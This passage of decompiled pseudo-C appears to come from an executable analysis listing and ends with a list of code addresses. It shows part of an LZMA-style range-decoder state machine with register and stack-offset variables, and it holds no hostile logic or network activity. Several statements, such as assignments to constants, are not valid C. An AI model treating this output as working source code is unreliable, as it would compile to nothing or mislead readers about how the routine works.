                                                                                                                          											__eax =  *(__ebp - 0x2c);
                                                                                                                          											goto L102;
                                                                                                                          										case 0xd:
                                                                                                                          											L37:
                                                                                                                          											__eflags =  *(__ebp - 0x6c);
                                                                                                                          											if( *(__ebp - 0x6c) == 0) {
                                                                                                                          												 *(__ebp - 0x88) = 0xd;
                                                                                                                          												goto L170;
                                                                                                                          											}
                                                                                                                          											__ecx =  *(__ebp - 0x70);
                                                                                                                          											__eax =  *(__ebp - 0xc);
                                                                                                                          											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                                                          											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                          											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                                                          											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                          											_t122 = __ebp - 0x70;
                                                                                                                          											 *_t122 =  *(__ebp - 0x70) + 1;
                                                                                                                          											__eflags =  *_t122;
                                                                                                                          											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                          											L39:
                                                                                                                          											__eax =  *(__ebp - 0x40);
                                                                                                                          											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                                                                                                                          											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
                                                                                                                          												goto L48;
                                                                                                                          											}
                                                                                                                          											__eflags = __ebx - 0x100;
                                                                                                                          											if(__ebx >= 0x100) {
                                                                                                                          												goto L54;
                                                                                                                          											}
                                                                                                                          											L41:
                                                                                                                          											__eax =  *(__ebp - 0x5b) & 0x000000ff;
                                                                                                                          											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
                                                                                                                          											__ecx =  *(__ebp - 0x58);
                                                                                                                          											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
                                                                                                                          											 *(__ebp - 0x48) = __eax;
                                                                                                                          											__eax = __eax + 1;
                                                                                                                          											__eax = __eax << 8;
                                                                                                                          											__eax = __eax + __ebx;
                                                                                                                          											__esi =  *(__ebp - 0x58) + __eax * 2;
                                                                                                                          											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                                                                                          											__ax =  *__esi;
                                                                                                                          											 *(__ebp - 0x54) = __esi;
                                                                                                                          											__edx = __ax & 0x0000ffff;
                                                                                                                          											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
                                                                                                                          											__eflags =  *(__ebp - 0xc) - __ecx;
                                                                                                                          											if( *(__ebp - 0xc) >= __ecx) {
                                                                                                                          												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                                                                          												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                                                                          												__cx = __ax;
                                                                                                                          												 *(__ebp - 0x40) = 1;
                                                                                                                          												__cx = __ax >> 5;
                                                                                                                          												__eflags = __eax;
                                                                                                                          												__ebx = __ebx + __ebx + 1;
                                                                                                                          												 *__esi = __ax;
                                                                                                                          											} else {
                                                                                                                          												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
                                                                                                                          												 *(__ebp - 0x10) = __ecx;
                                                                                                                          												0x800 = 0x800 - __edx;
                                                                                                                          												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
                                                                                                                          												__ebx = __ebx + __ebx;
                                                                                                                          												 *__esi = __cx;
                                                                                                                          											}
                                                                                                                          											__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                                                          											 *(__ebp - 0x44) = __ebx;
                                                                                                                          											if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                                                          												goto L39;
                                                                                                                          											} else {
                                                                                                                          												goto L37;
                                                                                                                          											}
                                                                                                                          										case 0xe:
                                                                                                                          											L46:
                                                                                                                          											__eflags =  *(__ebp - 0x6c);
                                                                                                                          											if( *(__ebp - 0x6c) == 0) {
                                                                                                                          												 *(__ebp - 0x88) = 0xe;
                                                                                                                          												goto L170;
                                                                                                                          											}
                                                                                                                          											__ecx =  *(__ebp - 0x70);
                                                                                                                          											__eax =  *(__ebp - 0xc);
                                                                                                                          											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                                                          											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                          											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                                                          											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                          											_t156 = __ebp - 0x70;
                                                                                                                          											 *_t156 =  *(__ebp - 0x70) + 1;
                                                                                                                          											__eflags =  *_t156;
                                                                                                                          											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                          											while(1) {
                                                                                                                          												L48:
                                                                                                                          												__eflags = __ebx - 0x100;
                                                                                                                          												if(__ebx >= 0x100) {
                                                                                                                          													break;
                                                                                                                          												}
                                                                                                                          												__eax =  *(__ebp - 0x58);
                                                                                                                          												__edx = __ebx + __ebx;
                                                                                                                          												__ecx =  *(__ebp - 0x10);
                                                                                                                          												__esi = __edx + __eax;
                                                                                                                          												__ecx =  *(__ebp - 0x10) >> 0xb;
                                                                                                                          												__ax =  *__esi;
                                                                                                                          												 *(__ebp - 0x54) = __esi;
                                                                                                                          												__edi = __ax & 0x0000ffff;
                                                                                                                          												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                                                                                          												__eflags =  *(__ebp - 0xc) - __ecx;
                                                                                                                          												if( *(__ebp - 0xc) >= __ecx) {
                                                                                                                          													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                                                                          													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                                                                          													__cx = __ax;
                                                                                                                          													_t170 = __edx + 1; // 0x1
                                                                                                                          													__ebx = _t170;
                                                                                                                          													__cx = __ax >> 5;
                                                                                                                          													__eflags = __eax;
                                                                                                                          													 *__esi = __ax;
                                                                                                                          												} else {
                                                                                                                          													 *(__ebp - 0x10) = __ecx;
                                                                                                                          													0x800 = 0x800 - __edi;
                                                                                                                          													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                                                                                          													__ebx = __ebx + __ebx;
                                                                                                                          													 *__esi = __cx;
                                                                                                                          												}
                                                                                                                          												__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                                                          												 *(__ebp - 0x44) = __ebx;
                                                                                                                          												if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                                                          													continue;
                                                                                                                          												} else {
                                                                                                                          													goto L46;
                                                                                                                          												}
                                                                                                                          											}
                                                                                                                          											L54:
                                                                                                                          											_t173 = __ebp - 0x34;
                                                                                                                          											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
                                                                                                                          											__eflags =  *_t173;
                                                                                                                          											goto L55;
                                                                                                                          										case 0xf:
                                                                                                                          											L58:
                                                                                                                          											__eflags =  *(__ebp - 0x6c);
                                                                                                                          											if( *(__ebp - 0x6c) == 0) {
                                                                                                                          												 *(__ebp - 0x88) = 0xf;
                                                                                                                          												goto L170;
                                                                                                                          											}
                                                                                                                          											__ecx =  *(__ebp - 0x70);
                                                                                                                          											__eax =  *(__ebp - 0xc);
                                                                                                                          											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                                                          											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                          											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                                                          											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                          											_t203 = __ebp - 0x70;
                                                                                                                          											 *_t203 =  *(__ebp - 0x70) + 1;
                                                                                                                          											__eflags =  *_t203;
                                                                                                                          											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                          											L60:
                                                                                                                          											__eflags = __ebx - 0x100;
                                                                                                                          											if(__ebx >= 0x100) {
                                                                                                                          												L55:
                                                                                                                          												__al =  *(__ebp - 0x44);
                                                                                                                          												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
                                                                                                                          												goto L56;
                                                                                                                          											}
                                                                                                                          											L61:
                                                                                                                          											__eax =  *(__ebp - 0x58);
                                                                                                                          											__edx = __ebx + __ebx;
                                                                                                                          											__ecx =  *(__ebp - 0x10);
                                                                                                                          											__esi = __edx + __eax;
                                                                                                                          											__ecx =  *(__ebp - 0x10) >> 0xb;
                                                                                                                          											__ax =  *__esi;
                                                                                                                          											 *(__ebp - 0x54) = __esi;
                                                                                                                          											__edi = __ax & 0x0000ffff;
                                                                                                                          											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                                                                                          											__eflags =  *(__ebp - 0xc) - __ecx;
                                                                                                                          											if( *(__ebp - 0xc) >= __ecx) {
                                                                                                                          												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                                                                          												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                                                                          												__cx = __ax;
                                                                                                                          												_t217 = __edx + 1; // 0x1
                                                                                                                          												__ebx = _t217;
                                                                                                                          												__cx = __ax >> 5;
                                                                                                                          												__eflags = __eax;
                                                                                                                          												 *__esi = __ax;
                                                                                                                          											} else {
                                                                                                                          												 *(__ebp - 0x10) = __ecx;
                                                                                                                          												0x800 = 0x800 - __edi;
                                                                                                                          												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                                                                                          												__ebx = __ebx + __ebx;
                                                                                                                          												 *__esi = __cx;
                                                                                                                          											}
                                                                                                                          											__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                                                          											 *(__ebp - 0x44) = __ebx;
                                                                                                                          											if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                                                          												goto L60;
                                                                                                                          											} else {
                                                                                                                          												goto L58;
                                                                                                                          											}
                                                                                                                          										case 0x10:
                                                                                                                          											L110:
                                                                                                                          											__eflags =  *(__ebp - 0x6c);
                                                                                                                          											if( *(__ebp - 0x6c) == 0) {
                                                                                                                          												 *(__ebp - 0x88) = 0x10;
                                                                                                                          												goto L170;
                                                                                                                          											}
                                                                                                                          											__ecx =  *(__ebp - 0x70);
                                                                                                                          											__eax =  *(__ebp - 0xc);
                                                                                                                          											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                                                          											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                          											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                                                          											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                          											_t366 = __ebp - 0x70;
                                                                                                                          											 *_t366 =  *(__ebp - 0x70) + 1;
                                                                                                                          											__eflags =  *_t366;
                                                                                                                          											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                          											goto L112;
                                                                                                                          										case 0x11:
                                                                                                                          											L69:
                                                                                                                          											__esi =  *(__ebp - 0x58);
                                                                                                                          											 *(__ebp - 0x84) = 0x12;
                                                                                                                          											L132:
                                                                                                                          											 *(_t612 - 0x54) = _t605;
                                                                                                                          											goto L133;
                                                                                                                          										case 0x12:
                                                                                                                          											goto L0;
                                                                                                                          										case 0x13:
                                                                                                                          											__eflags =  *(__ebp - 0x40);
                                                                                                                          											if( *(__ebp - 0x40) != 0) {
                                                                                                                          												_t469 = __ebp - 0x58;
                                                                                                                          												 *_t469 =  *(__ebp - 0x58) + 0x204;
                                                                                                                          												__eflags =  *_t469;
                                                                                                                          												 *(__ebp - 0x30) = 0x10;
                                                                                                                          												 *(__ebp - 0x40) = 8;
                                                                                                                          												goto L144;
                                                                                                                          											}
                                                                                                                          											__eax =  *(__ebp - 0x4c);
                                                                                                                          											__ecx =  *(__ebp - 0x58);
                                                                                                                          											__eax =  *(__ebp - 0x4c) << 4;
                                                                                                                          											 *(__ebp - 0x30) = 8;
                                                                                                                          											__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
                                                                                                                          											goto L130;
                                                                                                                          										case 0x14:
                                                                                                                          											 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
                                                                                                                          											__eax =  *(__ebp - 0x80);
                                                                                                                          											L140:
                                                                                                                          											 *(_t612 - 0x88) = _t533;
                                                                                                                          											goto L1;
                                                                                                                          										case 0x15:
                                                                                                                          											__eax = 0;
                                                                                                                          											__eflags =  *(__ebp - 0x38) - 7;
                                                                                                                          											0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                                                                                          											__al = __al & 0x000000fd;
                                                                                                                          											__eax = (__eflags >= 0) - 1 + 0xb;
                                                                                                                          											 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
                                                                                                                          											goto L121;
                                                                                                                          										case 0x16:
                                                                                                                          											__eax =  *(__ebp - 0x30);
                                                                                                                          											__eflags = __eax - 4;
                                                                                                                          											if(__eax >= 4) {
                                                                                                                          												_push(3);
                                                                                                                          												_pop(__eax);
                                                                                                                          											}
                                                                                                                          											__ecx =  *(__ebp - 4);
                                                                                                                          											 *(__ebp - 0x40) = 6;
                                                                                                                          											__eax = __eax << 7;
                                                                                                                          											 *(__ebp - 0x7c) = 0x19;
                                                                                                                          											 *(__ebp - 0x58) = __eax;
                                                                                                                          											goto L145;
                                                                                                                          										case 0x17:
                                                                                                                          											goto L145;
                                                                                                                          										case 0x18:
                                                                                                                          											L146:
                                                                                                                          											__eflags =  *(__ebp - 0x6c);
                                                                                                                          											if( *(__ebp - 0x6c) == 0) {
                                                                                                                          												 *(__ebp - 0x88) = 0x18;
                                                                                                                          												goto L170;
                                                                                                                          											}
                                                                                                                          											__ecx =  *(__ebp - 0x70);
                                                                                                                          											__eax =  *(__ebp - 0xc);
                                                                                                                          											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                                                          											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                          											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                                                          											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                          											_t484 = __ebp - 0x70;
                                                                                                                          											 *_t484 =  *(__ebp - 0x70) + 1;
                                                                                                                          											__eflags =  *_t484;
                                                                                                                          											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                          											L148:
                                                                                                                          											_t487 = __ebp - 0x48;
                                                                                                                          											 *_t487 =  *(__ebp - 0x48) - 1;
                                                                                                                          											__eflags =  *_t487;
                                                                                                                          											goto L149;
                                                                                                                          										case 0x19:
                                                                                                                          											__eflags = __ebx - 4;
                                                                                                                          											if(__ebx < 4) {
                                                                                                                          												 *(__ebp - 0x2c) = __ebx;
                                                                                                                          												L120:
                                                                                                                          												_t394 = __ebp - 0x2c;
                                                                                                                          												 *_t394 =  *(__ebp - 0x2c) + 1;
                                                                                                                          												__eflags =  *_t394;
                                                                                                                          												L121:
                                                                                                                          												__eax =  *(__ebp - 0x2c);
                                                                                                                          												__eflags = __eax;
                                                                                                                          												if(__eax == 0) {
                                                                                                                          													 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
                                                                                                                          													goto L170;
                                                                                                                          												}
                                                                                                                          												__eflags = __eax -  *(__ebp - 0x60);
                                                                                                                          												if(__eax >  *(__ebp - 0x60)) {
                                                                                                                          													goto L171;
                                                                                                                          												}
                                                                                                                          												 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
                                                                                                                          												__eax =  *(__ebp - 0x30);
                                                                                                                          												_t401 = __ebp - 0x60;
                                                                                                                          												 *_t401 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
                                                                                                                          												__eflags =  *_t401;
                                                                                                                          												goto L124;
                                                                                                                          											}
                                                                                                                          											__ecx = __ebx;
                                                                                                                          											__eax = __ebx;
                                                                                                                          											__ecx = __ebx >> 1;
                                                                                                                          											__eax = __ebx & 0x00000001;
                                                                                                                          											__ecx = (__ebx >> 1) - 1;
                                                                                                                          											__al = __al | 0x00000002;
                                                                                                                          											__eax = (__ebx & 0x00000001) << __cl;
                                                                                                                          											__eflags = __ebx - 0xe;
                                                                                                                          											 *(__ebp - 0x2c) = __eax;
                                                                                                                          											if(__ebx >= 0xe) {
                                                                                                                          												__ebx = 0;
                                                                                                                          												 *(__ebp - 0x48) = __ecx;
                                                                                                                          												L103:
                                                                                                                          												__eflags =  *(__ebp - 0x48);
                                                                                                                          												if( *(__ebp - 0x48) <= 0) {
                                                                                                                          													__eax = __eax + __ebx;
                                                                                                                          													 *(__ebp - 0x40) = 4;
                                                                                                                          													 *(__ebp - 0x2c) = __eax;
                                                                                                                          													__eax =  *(__ebp - 4);
                                                                                                                          													__eax =  *(__ebp - 4) + 0x644;
                                                                                                                          													__eflags = __eax;
                                                                                                                          													L109:
                                                                                                                          													__ebx = 0;
                                                                                                                          													 *(__ebp - 0x58) = __eax;
                                                                                                                          													 *(__ebp - 0x50) = 1;
                                                                                                                          													 *(__ebp - 0x44) = 0;
                                                                                                                          													 *(__ebp - 0x48) = 0;
                                                                                                                          													L113:
                                                                                                                          													__eax =  *(__ebp - 0x40);
                                                                                                                          													__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                                                                                                                          													if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
                                                                                                                          														_t392 = __ebp - 0x2c;
                                                                                                                          														 *_t392 =  *(__ebp - 0x2c) + __ebx;
                                                                                                                          														__eflags =  *_t392;
                                                                                                                          														goto L120;
                                                                                                                          													}
                                                                                                                          													__eax =  *(__ebp - 0x50);
                                                                                                                          													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                                                                                          													__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                                                                                                                          													__eax =  *(__ebp - 0x58);
                                                                                                                          													__esi = __edi + __eax;
                                                                                                                          													 *(__ebp - 0x54) = __esi;
                                                                                                                          													__ax =  *__esi;
                                                                                                                          													__ecx = __ax & 0x0000ffff;
                                                                                                                          													__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
                                                                                                                          													__eflags =  *(__ebp - 0xc) - __edx;
                                                                                                                          													if( *(__ebp - 0xc) >= __edx) {
                                                                                                                          														__ecx = 0;
                                                                                                                          														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
                                                                                                                          														__ecx = 1;
                                                                                                                          														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
                                                                                                                          														__ebx = 1;
                                                                                                                          														__ecx =  *(__ebp - 0x48);
                                                                                                                          														__ebx = 1 << __cl;
                                                                                                                          														__ecx = 1 << __cl;
                                                                                                                          														__ebx =  *(__ebp - 0x44);
                                                                                                                          														__ebx =  *(__ebp - 0x44) | __ecx;
                                                                                                                          														__cx = __ax;
                                                                                                                          														__cx = __ax >> 5;
                                                                                                                          														__eax = __eax - __ecx;
                                                                                                                          														__edi = __edi + 1;
                                                                                                                          														__eflags = __edi;
                                                                                                                          														 *(__ebp - 0x44) = __ebx;
                                                                                                                          														 *__esi = __ax;
                                                                                                                          														 *(__ebp - 0x50) = __edi;
                                                                                                                          													} else {
                                                                                                                          														 *(__ebp - 0x10) = __edx;
                                                                                                                          														0x800 = 0x800 - __ecx;
                                                                                                                          														0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
                                                                                                                          														 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                                                                                                                          														 *__esi = __dx;
                                                                                                                          													}
                                                                                                                          													__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                                                          													if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                                                          														L112:
                                                                                                                          														_t369 = __ebp - 0x48;
                                                                                                                          														 *_t369 =  *(__ebp - 0x48) + 1;
                                                                                                                          														__eflags =  *_t369;
                                                                                                                          														goto L113;
                                                                                                                          													} else {
                                                                                                                          														goto L110;
                                                                                                                          													}
                                                                                                                          												}
                                                                                                                          												__ecx =  *(__ebp - 0xc);
                                                                                                                          												__ebx = __ebx + __ebx;
                                                                                                                          												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
                                                                                                                          												__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                                                                                                                          												 *(__ebp - 0x44) = __ebx;
                                                                                                                          												if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
                                                                                                                          													__ecx =  *(__ebp - 0x10);
                                                                                                                          													 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                                                                                                                          													__ebx = __ebx | 0x00000001;
                                                                                                                          													__eflags = __ebx;
                                                                                                                          													 *(__ebp - 0x44) = __ebx;
                                                                                                                          												}
                                                                                                                          												__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                                                          												if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                                                          													L102:
                                                                                                                          													_t339 = __ebp - 0x48;
                                                                                                                          													 *_t339 =  *(__ebp - 0x48) - 1;
                                                                                                                          													__eflags =  *_t339;
                                                                                                                          													goto L103;
                                                                                                                          												} else {
                                                                                                                          													goto L100;
                                                                                                                          												}
                                                                                                                          											}
                                                                                                                          											__edx =  *(__ebp - 4);
                                                                                                                          											__eax = __eax - __ebx;
                                                                                                                          											 *(__ebp - 0x40) = __ecx;
                                                                                                                          											__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
                                                                                                                          											goto L109;
                                                                                                                          										case 0x1a:
                                                                                                                          											L56:
                                                                                                                          											__eflags =  *(__ebp - 0x64);
                                                                                                                          											if( *(__ebp - 0x64) == 0) {
                                                                                                                          												 *(__ebp - 0x88) = 0x1a;
                                                                                                                          												goto L170;
                                                                                                                          											}
                                                                                                                          											__ecx =  *(__ebp - 0x68);
                                                                                                                          											__al =  *(__ebp - 0x5c);
                                                                                                                          											__edx =  *(__ebp - 8);
                                                                                                                          											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                                                                                                                          											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                                                                                          											 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                                                                                                                          											 *( *(__ebp - 0x68)) = __al;
                                                                                                                          											__ecx =  *(__ebp - 0x14);
                                                                                                                          											 *(__ecx +  *(__ebp - 8)) = __al;
                                                                                                                          											__eax = __ecx + 1;
                                                                                                                          											__edx = 0;
                                                                                                                          											_t192 = __eax %  *(__ebp - 0x74);
                                                                                                                          											__eax = __eax /  *(__ebp - 0x74);
                                                                                                                          											__edx = _t192;
                                                                                                                          											goto L80;
                                                                                                                          										case 0x1b:
                                                                                                                          											L76:
                                                                                                                          											__eflags =  *(__ebp - 0x64);
                                                                                                                          											if( *(__ebp - 0x64) == 0) {
                                                                                                                          												 *(__ebp - 0x88) = 0x1b;
                                                                                                                          												goto L170;
                                                                                                                          											}
                                                                                                                          											__eax =  *(__ebp - 0x14);
                                                                                                                          											__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                                                                                          											__eflags = __eax -  *(__ebp - 0x74);
                                                                                                                          											if(__eax >=  *(__ebp - 0x74)) {
                                                                                                                          												__eax = __eax +  *(__ebp - 0x74);
                                                                                                                          												__eflags = __eax;
                                                                                                                          											}
                                                                                                                          											__edx =  *(__ebp - 8);
                                                                                                                          											__cl =  *(__eax + __edx);
                                                                                                                          											__eax =  *(__ebp - 0x14);
                                                                                                                          											 *(__ebp - 0x5c) = __cl;
                                                                                                                          											 *(__eax + __edx) = __cl;
                                                                                                                          											__eax = __eax + 1;
                                                                                                                          											__edx = 0;
                                                                                                                          											_t275 = __eax %  *(__ebp - 0x74);
                                                                                                                          											__eax = __eax /  *(__ebp - 0x74);
                                                                                                                          											__edx = _t275;
                                                                                                                          											__eax =  *(__ebp - 0x68);
                                                                                                                          											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                                                                                                                          											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                                                                                          											_t284 = __ebp - 0x64;
                                                                                                                          											 *_t284 =  *(__ebp - 0x64) - 1;
                                                                                                                          											__eflags =  *_t284;
                                                                                                                          											 *( *(__ebp - 0x68)) = __cl;
                                                                                                                          											L80:
                                                                                                                          											 *(__ebp - 0x14) = __edx;
                                                                                                                          											goto L81;
                                                                                                                          										case 0x1c:
                                                                                                                          											while(1) {
                                                                                                                          												L124:
                                                                                                                          												__eflags =  *(__ebp - 0x64);
                                                                                                                          												if( *(__ebp - 0x64) == 0) {
                                                                                                                          													break;
                                                                                                                          												}
                                                                                                                          												__eax =  *(__ebp - 0x14);
                                                                                                                          												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                                                                                          												__eflags = __eax -  *(__ebp - 0x74);
                                                                                                                          												if(__eax >=  *(__ebp - 0x74)) {
                                                                                                                          													__eax = __eax +  *(__ebp - 0x74);
                                                                                                                          													__eflags = __eax;
                                                                                                                          												}
                                                                                                                          												__edx =  *(__ebp - 8);
                                                                                                                          												__cl =  *(__eax + __edx);
                                                                                                                          												__eax =  *(__ebp - 0x14);
                                                                                                                          												 *(__ebp - 0x5c) = __cl;
                                                                                                                          												 *(__eax + __edx) = __cl;
                                                                                                                          												__eax = __eax + 1;
                                                                                                                          												__edx = 0;
                                                                                                                          												_t415 = __eax %  *(__ebp - 0x74);
                                                                                                                          												__eax = __eax /  *(__ebp - 0x74);
                                                                                                                          												__edx = _t415;
                                                                                                                          												__eax =  *(__ebp - 0x68);
                                                                                                                          												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                                                                                          												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                                                                                                                          												 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
                                                                                                                          												__eflags =  *(__ebp - 0x30);
                                                                                                                          												 *( *(__ebp - 0x68)) = __cl;
                                                                                                                          												 *(__ebp - 0x14) = _t415;
                                                                                                                          												if( *(__ebp - 0x30) > 0) {
                                                                                                                          													continue;
                                                                                                                          												} else {
                                                                                                                          													L81:
                                                                                                                          													 *(__ebp - 0x88) = 2;
                                                                                                                          													goto L1;
                                                                                                                          												}
                                                                                                                          											}
                                                                                                                          											 *(__ebp - 0x88) = 0x1c;
                                                                                                                          											L170:
                                                                                                                          											_push(0x22);
                                                                                                                          											_pop(_t567);
                                                                                                                          											memcpy( *(_t612 - 0x90), _t612 - 0x88, _t567 << 2);
                                                                                                                          											_t535 = 0;
                                                                                                                          											L172:
                                                                                                                          											return _t535;
                                                                                                                          									}
                                                                                                                          								}
                                                                                                                          								L171:
                                                                                                                          								_t535 = _t534 | 0xffffffff;
                                                                                                                          								goto L172;
                                                                                                                          							}
                                                                                                                          						}
                                                                                                                          						__eax =  *(__ebp - 0x50);
                                                                                                                          						 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                                                                                          						__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                                                                                                                          						__eax =  *(__ebp - 0x58);
                                                                                                                          						__esi = __edx + __eax;
                                                                                                                          						 *(__ebp - 0x54) = __esi;
                                                                                                                          						__ax =  *__esi;
                                                                                                                          						__edi = __ax & 0x0000ffff;
                                                                                                                          						__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                                                                                          						if( *(__ebp - 0xc) >= __ecx) {
                                                                                                                          							 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                                                                          							 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                                                                          							__cx = __ax;
                                                                                                                          							__cx = __ax >> 5;
                                                                                                                          							__eax = __eax - __ecx;
                                                                                                                          							__edx = __edx + 1;
                                                                                                                          							 *__esi = __ax;
                                                                                                                          							 *(__ebp - 0x50) = __edx;
                                                                                                                          						} else {
                                                                                                                          							 *(__ebp - 0x10) = __ecx;
                                                                                                                          							0x800 = 0x800 - __edi;
                                                                                                                          							0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                                                                                          							 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                                                                                                                          							 *__esi = __cx;
                                                                                                                          						}
                                                                                                                          						if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                                                          							goto L148;
                                                                                                                          						} else {
                                                                                                                          							goto L146;
                                                                                                                          						}
                                                                                                                          					}
                                                                                                                          					goto L1;
                                                                                                                          				}
                                                                                                                          			}








                                                                                                                          0x00000000
                                                                                                                          0x00407395
                                                                                                                          0x00407395
                                                                                                                          0x00407399
                                                                                                                          0x004073be
                                                                                                                          0x004073c8
                                                                                                                          0x00000000
                                                                                                                          0x0040739b
                                                                                                                          0x0040739b
                                                                                                                          0x0040739e
                                                                                                                          0x004073a2
                                                                                                                          0x004073a5
                                                                                                                          0x004073a8
                                                                                                                          0x004073ac
                                                                                                                          0x004073ac
                                                                                                                          0x004073af
                                                                                                                          0x00407489
                                                                                                                          0x00407489
                                                                                                                          0x00407490
                                                                                                                          0x00407490
                                                                                                                          0x00407493
                                                                                                                          0x0040749a
                                                                                                                          0x004074c7
                                                                                                                          0x004074cb
                                                                                                                          0x0040752b
                                                                                                                          0x0040752e
                                                                                                                          0x00407533
                                                                                                                          0x00407534
                                                                                                                          0x00407536
                                                                                                                          0x00407538
                                                                                                                          0x0040753b
                                                                                                                          0x00407447
